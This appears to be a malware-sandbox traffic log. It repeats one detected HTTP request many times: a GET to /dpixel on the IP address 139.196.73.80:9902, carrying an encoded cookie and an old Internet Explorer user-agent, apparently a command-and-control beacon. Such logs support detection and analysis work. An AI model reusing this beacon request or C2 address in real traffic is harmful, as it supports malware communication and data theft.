Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dpixel HTTP/1.1Accept: /Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM)Host: 139.196.73.80:9902Connection: Keep-AliveCache-Control: no-cache
